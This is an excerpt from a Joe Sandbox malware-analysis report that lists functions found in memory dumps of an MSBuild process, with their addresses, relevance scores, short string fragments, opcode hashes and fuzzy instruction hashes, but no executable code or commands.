Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 92739479ab38587227ea951136192ff164a56acb63360ec43462cb120350b8e0
Instruction ID: 60a4e13c5f717ddfd9c74c46045dbdefffcf01db4c3eab4b2d0654fd5035c810
Opcode Fuzzy Hash: 92739479ab38587227ea951136192ff164a56acb63360ec43462cb120350b8e0
Instruction Fuzzy Hash: 25917130F04219DFDB18EBB9985437EBBA6BFC8700B15862DE546EB294CE359C028795

Function 0103C73E Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103C9A0
PHq, xrefs: 0103C98F

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: e6168a4a0258de00399963f3b0657b5a10de8c482fa099a7af6b14f420ce3d7b
Instruction ID: d069e6e28d095b7b49104c37bc9b0f5b9b121675b8590a0eb3d857f4ad3748aa
Opcode Fuzzy Hash: e6168a4a0258de00399963f3b0657b5a10de8c482fa099a7af6b14f420ce3d7b
Instruction Fuzzy Hash: C081A074E00218DFEB54DFAAD984A9DBBF2BF88310F14C06AE459AB365DB709941CF50

Function 0103C1A7 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103C400
PHq, xrefs: 0103C3EF

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: f2a467e5d3431de5fdca10f1a4640906fa4ef34128bca5c0afe6a5827a8a3cfe
Instruction ID: 495cbe75d8bb474e7e694ad7b641fe7eedbe9f77e3edf9302333eaa0beb75ce5
Opcode Fuzzy Hash: f2a467e5d3431de5fdca10f1a4640906fa4ef34128bca5c0afe6a5827a8a3cfe
Instruction Fuzzy Hash: E5818F74E002188FEB54DFAAD984A9DBBF2BF89300F14D06AE459AB365DB709941CF50

Function 0103D284 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103D4CF
PHq, xrefs: 0103D4E0

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: be36ecd965a1803b1d81aa0c24374f4c9cd3454a9c11ba715daf63fef726c310
Instruction ID: c42891fe4954217ff29e14cafec203db767850ab4854686e0dbf9b3dde59f330
Opcode Fuzzy Hash: be36ecd965a1803b1d81aa0c24374f4c9cd3454a9c11ba715daf63fef726c310
Instruction Fuzzy Hash: B4819074E00218CFEB54DFAAD984A9DBBF2BF88300F14D069E859AB365DB709941CF51

Function 0103C477 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103C6BF
PHq, xrefs: 0103C6D0

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 28775ba77d47f5b175d0e05f795751526bb58c6875d5989c562738fe236b5fb2
Instruction ID: 60535a31a67e3f9800a67820f32cd5b60f42a7bc93961321046f51da5b8fe11c
Opcode Fuzzy Hash: 28775ba77d47f5b175d0e05f795751526bb58c6875d5989c562738fe236b5fb2
Instruction Fuzzy Hash: 8081A174E00218CFEB54DFAAD984A9DBBF2BF88300F14906AE459AB365DB709941DF50

Function 0103CCE7 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103CF2F
PHq, xrefs: 0103CF40

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: ae07ea9da7938e62c2825e9031965f9b54d6699b2d24dcd7af06469039e5734a
Instruction ID: f1328f2d56e37662f2126459efc2e25a3921ddeb41e1feb8352af0773a7ec80c
Opcode Fuzzy Hash: ae07ea9da7938e62c2825e9031965f9b54d6699b2d24dcd7af06469039e5734a
Instruction Fuzzy Hash: 6C819274E00218CFEB54DFAAD984A9DBBF2BF88300F14D06AE459AB365DB709941CF51

Function 0103CFB7 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103D210
PHq, xrefs: 0103D1FF

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: b4a2896e3ee20459d3987e39503bf2b5b604888e042e4334d5c094ceb5f79a5e
Instruction ID: d6102e44fd4df3930d28f369fe998de919cabffdba9066d1bcee3048dbc8ccae
Opcode Fuzzy Hash: b4a2896e3ee20459d3987e39503bf2b5b604888e042e4334d5c094ceb5f79a5e
Instruction Fuzzy Hash: FD819074E00218DFEB54DFAAD984B9DBBF2BF88300F149169E859AB365DB709941CF10

Function 01035381 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 010355D9
PHq, xrefs: 010355C8

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: f11f2ff38cf7cda77287df0ff6efed1cd978611a842ee63a9305a3f37acc0727
Instruction ID: e813c185e46a1319b81711e01bc879aa920b34b9c1aa174088f9aae600bc159e
Opcode Fuzzy Hash: f11f2ff38cf7cda77287df0ff6efed1cd978611a842ee63a9305a3f37acc0727
Instruction Fuzzy Hash: A061B674E00218DFDB58DFAAD984A9DBBF2BF88300F14C169E859AB365DB349941CF50

Function 0103CA19 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

PHq, xrefs: 0103CC70
PHq, xrefs: 0103CC5F

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: ea84006bba287106d4738a7be097ed10ea8ffcb7737c7972c89ee41cd6a97a19
Instruction ID: bf0719e0012d4a7197934accd03013f7e7d83fcb1257d3a262ec47a1b4851b2e
Opcode Fuzzy Hash: ea84006bba287106d4738a7be097ed10ea8ffcb7737c7972c89ee41cd6a97a19
Instruction Fuzzy Hash: EA51C674E006088FEB18DFAAD984A9DBBF2BF88300F14D06AE458BB365DB745941CF50

Function 054C97B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a5b5fa1b6b47d0ef9ac14fd4a268a85c5a65f8abc8bea63b26ad1dd0c221d5
Instruction ID: 9d8b708620b0ade92c01c712ae88314bf8ca71e269687905e90ff2aed4966344
Opcode Fuzzy Hash: 45a5b5fa1b6b47d0ef9ac14fd4a268a85c5a65f8abc8bea63b26ad1dd0c221d5
Instruction Fuzzy Hash: A1F1F374E01218DFDB54DFA9C984BDDBBB2BF88304F5481AAD408AB355DB70A986CF50

Function 0103EC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457753915ff510f9709ae696d91a0df582cc461db040adf804cc0886d9b6c5dc
Instruction ID: 587b73b1a7ac0bcac39af2334347938c7fc828dccfb38454f432b2a92d011e69
Opcode Fuzzy Hash: 457753915ff510f9709ae696d91a0df582cc461db040adf804cc0886d9b6c5dc
Instruction Fuzzy Hash: 55519774E00308DFEB18DFAAD594A9DBBF2BF89300F249169E815AB364DB305942CF14

Function 0103EC17 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f2c0a5a4b40d81a3ceb96e1056a3a52e56d088f3222f06d80ec80eef4951ab5
Instruction ID: cca6c5bfd0bbf4a577e784297257099ee17fa320a8160c629426d6941d222af5
Opcode Fuzzy Hash: 2f2c0a5a4b40d81a3ceb96e1056a3a52e56d088f3222f06d80ec80eef4951ab5
Instruction Fuzzy Hash: 5A518674E04208DFDB19DFAAD494A9DBBF2BF89300F24916AE815AB365DB305846CF14

Function 010376F1 Relevance: 10.5, Strings: 8, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 0103772E
(oq, xrefs: 010378B2
(oq, xrefs: 010377E9
,q, xrefs: 01037BA0
(oq, xrefs: 01037BFF
(oq, xrefs: 01037815
,q, xrefs: 01037B90
(oq, xrefs: 01037C0F

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: f62651f094fb91a6e6087424d19491d2e4bd48bd291d5257ae625ef9a8f0913a
Instruction ID: ac9b86f5c6efd380a1679900d8414988c354315f4caa34325b2256a964fb7db9
Opcode Fuzzy Hash: f62651f094fb91a6e6087424d19491d2e4bd48bd291d5257ae625ef9a8f0913a
Instruction Fuzzy Hash: 80129B74A00209DFDB29CF69C884AAEBBF6FF89314F148599E985DB261D730ED41CB50

Function 01036498 Relevance: 4.0, Strings: 3, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 01036578
,q, xrefs: 0103656E
, xrefs: 010366EE

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: $,q$,q
API String ID: 0-1498352076
Opcode ID: 0938c1f30af48388c2fc29f4f369e8a119289a37d2eb1f3a2065a51886367d71
Instruction ID: 2ea54a61b23c2c83ea817844fffe7b5c600caa9eec6782a1680eeca9e2d21d8c
Opcode Fuzzy Hash: 0938c1f30af48388c2fc29f4f369e8a119289a37d2eb1f3a2065a51886367d71
Instruction Fuzzy Hash: DD81A030B00505EFDB54CF6DC484AADBBFABFC9240B1485A9D585DB3A5DB32E941CB60

Function 01035F38 Relevance: 2.8, Strings: 2, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 01036056
Hq, xrefs: 01036023

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 12715a67f1bd456ca3836c052ed12eb2e1d0ccb7cf841f0d3736727ebcbe2aac
Instruction ID: 41c9b381cefa7bc73c777dbdbf7fe6ba28a3372e70c759d9b1d0f654311ef75d
Opcode Fuzzy Hash: 12715a67f1bd456ca3836c052ed12eb2e1d0ccb7cf841f0d3736727ebcbe2aac
Instruction Fuzzy Hash: 5EB1CE307042049FDB159F69D894B7E7BFAAFC9300F184969E4868B3A6CB36C942C791

Function 0103CA0C Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0103CC70
PHq, xrefs: 0103CC5F

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 96f54809b29c065c763aba9b5df4298c54e36cadacd816a56cad493b429a39dd
Instruction ID: fab98cc91ffa327462e4d6c7f700fa7b6592e1d463cb49b04e174d8f7893af1f
Opcode Fuzzy Hash: 96f54809b29c065c763aba9b5df4298c54e36cadacd816a56cad493b429a39dd
Instruction Fuzzy Hash: C771D274E00258CFEB54DFA9D984A9DBBF1BF89300F24809AE459EB361DB309941CF50

Function 01038EF8 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

$q, xrefs: 01038FD7
$q, xrefs: 01038FB4

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: c4a7d6a0cb79d88cce33df4b1fda27dc29b0494cf8c2e7a620fe444b8578819c
Instruction ID: 0ce08bf39bdf7003715c72d46114ebec2242587a82e06290e7055cd8f5abc058
Opcode Fuzzy Hash: c4a7d6a0cb79d88cce33df4b1fda27dc29b0494cf8c2e7a620fe444b8578819c
Instruction Fuzzy Hash: EE3108307042458FEB254B39A89467EB7AFABC4710B1586EBF286CB293DE29CC418751

Function 01033CC0 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

Xq, xrefs: 01033CCD
Xq, xrefs: 01033CF6

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: 182855284126c9438e7d04b9c7c255bd7fa623024ecaec55c6897dcfd5f468d6
Instruction ID: 0b06ee95003f3584c6bae84809265929db13dd6378920d052a09e50535853639
Opcode Fuzzy Hash: 182855284126c9438e7d04b9c7c255bd7fa623024ecaec55c6897dcfd5f468d6
Instruction Fuzzy Hash: 3911A331B0032957EB79619E58D937FA1DEFBC1251F284039D99A8F255DEA1CC0282A1

Function 01039D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'q, xrefs: 01039D6D
4'q, xrefs: 01039D84

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 6d354462eb145554124a99c588f6afd5e32fb28bb2f63a625a5c594ca92b8683
Instruction ID: bdf5cc5ddbc6ed542449eda748bbb4f48120ac5cf3322ae444b4559327f2fd73
Opcode Fuzzy Hash: 6d354462eb145554124a99c588f6afd5e32fb28bb2f63a625a5c594ca92b8683
Instruction Fuzzy Hash: ECF049353016156FDB186AA6B8546BBBADFEBCC390B148465BA49C7350DE71CC1193A0

Function 01030C9F Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 01030F19

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: eef73cdce836a654ec7a39fad9bd9a8b2e5aa1d59d28f63327ee0865ed926feb
Instruction ID: bf6f68f04d0c37fade1552108ddffc9a02b85a64a9be4c1c4ed78381f9207594
Opcode Fuzzy Hash: eef73cdce836a654ec7a39fad9bd9a8b2e5aa1d59d28f63327ee0865ed926feb
Instruction Fuzzy Hash: 4B5216B8D44219CFCB54EF64E985B9DB7B2FB48705F1085A9D409AB368DB302E81CF91

Function 01030CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 01030F19

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 1d0707ba278e21a2e80a3229d11e58e0a5ae4b3f2c7cadab796673cba2cc6323
Instruction ID: a2e5eff71ac291dfa32410f363d5de23a8a032f2df74bed3ff057547de2533f9
Opcode Fuzzy Hash: 1d0707ba278e21a2e80a3229d11e58e0a5ae4b3f2c7cadab796673cba2cc6323
Instruction Fuzzy Hash: 975217B8D44219CFCB54EF64E985B9DB7B2FB48705F1085A9D409AB368DB302E81CF91

Function 054C9B94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 054C9CD6

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 365269f37c73342106da89b39e46863083c14eeafe6ec989a90fa57ea945a154
Instruction ID: bb3476e636d8a0dc5a3072a968fb8f36c9ef0752d4c313cead7e21b09eff68d0
Opcode Fuzzy Hash: 365269f37c73342106da89b39e46863083c14eeafe6ec989a90fa57ea945a154
Instruction Fuzzy Hash: B6114278E04219AFDB44DFA8D584EFDBBF5FBC8304F14819AE854A7246D730A941CB50

Function 0103AEF0 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

(oq, xrefs: 0103B079

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 9209f8873521089d8139524591afcf96cd2d1fadea5fd8bb985c78a4629f4056
Instruction ID: be63413f5718080918096604ec137bb41599fb09125eef08358f85094418c210
Opcode Fuzzy Hash: 9209f8873521089d8139524591afcf96cd2d1fadea5fd8bb985c78a4629f4056
Instruction Fuzzy Hash: 4C410771B042088FDB199F64E894AAEBBF7EFCC710F14446AE556DB395DE358C0287A0

Function 01035658 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

, xrefs: 01035669, 01035686, 010356A3, 01035739

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: 5a34b6671af9f6861dffbcfbe492e28ce36a148c41c963ce88fcc6db61c352f1
Instruction ID: bfdcaaeb9132f9560115157aecf69d94de20a2f195512d86236203ce0f1c5830
Opcode Fuzzy Hash: 5a34b6671af9f6861dffbcfbe492e28ce36a148c41c963ce88fcc6db61c352f1
Instruction Fuzzy Hash: C631613170424DAFCF029F64E899AAF3BB6FF88304F004465F95597299CB35C961DB90

Function 01038370 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

, xrefs: 0103838A

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: d7874ac78e2c8607956d91f82c7d6f3b6b3a82d3d1e6cdf82b5ef7febdec2622
Instruction ID: 15876a35f8f2dbf1bebaf2e9c11c8d74a6d1ba737b2ee7ef8cb29d7583dd4fd3
Opcode Fuzzy Hash: d7874ac78e2c8607956d91f82c7d6f3b6b3a82d3d1e6cdf82b5ef7febdec2622
Instruction Fuzzy Hash: 7421E2703042504FDB26163A949467E6A9AAFC4648704C2FFF592C7A9AEE258C02D341

Function 01038380 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

, xrefs: 0103838A

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: e003e1464fad31750b5fe890cb030a907689010222314af535599af2142cd7d1
Instruction ID: d60a8e0e7bd114583de447deb28fd7279495f32ab4587eb7238ddb503b12176a
Opcode Fuzzy Hash: e003e1464fad31750b5fe890cb030a907689010222314af535599af2142cd7d1
Instruction Fuzzy Hash: FC21D0303042104BEB15162A949473E66CBAFC4748F14C1BEF596CBB9AEE65CC429381

Function 01036300 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

, xrefs: 0103638A, 010363A7

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: 8472fe66dbace0e95c38d88eb163c6ebc715cf859f0bf35f4e00f10618461dcd
Instruction ID: dfc12b82734ed71de1e754dbf85e4a38290d7e8ef5997d5d86cecc158c2e5408
Opcode Fuzzy Hash: 8472fe66dbace0e95c38d88eb163c6ebc715cf859f0bf35f4e00f10618461dcd
Instruction Fuzzy Hash: 9321F335704614AFD7159A2AC494A3EBBE6FFC97547148478E946CB398CF32DC02CB80

Function 01035649 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

, xrefs: 01035669, 01035686, 010356A3

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: 98560e34f03bef88da779fb42b7b2b5a7b2850ec78c119cce50d1114d7c4aa38
Instruction ID: 1bc11bef07780541947fa1620372b332d23c5fb5d1c90b5b3535ab2370949004
Opcode Fuzzy Hash: 98560e34f03bef88da779fb42b7b2b5a7b2850ec78c119cce50d1114d7c4aa38
Instruction Fuzzy Hash: 8A219F717092489FDB02AF68E8996AE3BF5EB89314F004469F8458B25ADB348A51DB90

Function 01039761 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

, xrefs: 01039783

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: b97f66cb4a9bdb70bcf9dc371bb80329d7795559654f8ba96b9ccacfc2a5c4f9
Instruction ID: f655f3b98223d9f395dbfd4e4a4f53ef02332f5af308400469384ab9d94b45af
Opcode Fuzzy Hash: b97f66cb4a9bdb70bcf9dc371bb80329d7795559654f8ba96b9ccacfc2a5c4f9
Instruction Fuzzy Hash: 56217A74E05248EFDB05CFA5D590AEEBFBAAF88308F1480A9E445A6294DB30D941CB20

Function 010362F0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

, xrefs: 0103638A

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3162483948
Opcode ID: 5593b1f5626068ee980f0e81356d5a37807acae5263ff26edfb0f144bc6ebd01
Instruction ID: 5ed628016ed343941d3d09fc316f2b39412f5ab193c8753a1e6b115aedde43b0
Opcode Fuzzy Hash: 5593b1f5626068ee980f0e81356d5a37807acae5263ff26edfb0f144bc6ebd01
Instruction Fuzzy Hash: A61106357096159FD7158A2EC4A853E7BE6FFC975131884B9E546CB3A4CF31CC028B90

Function 0103E2A7 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae518e2636a8cff2fee3e74e397308834579510ec1596a98fa574ff087779cd3
Instruction ID: 485d6d9d881b1181f77911a8cfcdedc9412c2c9f1e6e8a41010f9bfd9ea7c56e
Opcode Fuzzy Hash: ae518e2636a8cff2fee3e74e397308834579510ec1596a98fa574ff087779cd3
Instruction Fuzzy Hash: EB12BB35CA920A8FD6546F31E6EC13EBA65FF0F323704AC14F1AFC18499F7015A98A65

Function 0103E2A8 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a19725b191756cbb185ba8e8d0ccbd64e26e3af6ca962040efccd422a3bb7326
Instruction ID: aaa0fafd3bcee206a3620da88c0ebfc136fa30058f72c0959c8eb5477982c915
Opcode Fuzzy Hash: a19725b191756cbb185ba8e8d0ccbd64e26e3af6ca962040efccd422a3bb7326
Instruction Fuzzy Hash: 3312BB35CA920A8FD6546F31F6EC13EBA65FF0F323704AC14F1AEC18499F7015A98A65

Function 010380D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f8ddf7515c27a85608c3fbf177200a5f0bb2aa830b2c97104f6d6edf653c0b
Instruction ID: d6050832acf7ea9a25a146aae756c190460634090a9e30062a1d626d74999613
Opcode Fuzzy Hash: 85f8ddf7515c27a85608c3fbf177200a5f0bb2aa830b2c97104f6d6edf653c0b
Instruction Fuzzy Hash: BF7159347006098FDB55DF6CC894AAE7BE9AF89200B1586EAF951DB371DB70DC41CB50

Function 0103F5BF Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d04ce3d2f451f6369d7c6ae158e4b4d4c3c8bf0dc4718f2e3e020518e5c7070
Instruction ID: c328c62eef5908aaf10781e39ae07a0fc74bbeaacdfbf3ce1f3dc149255d7ad3
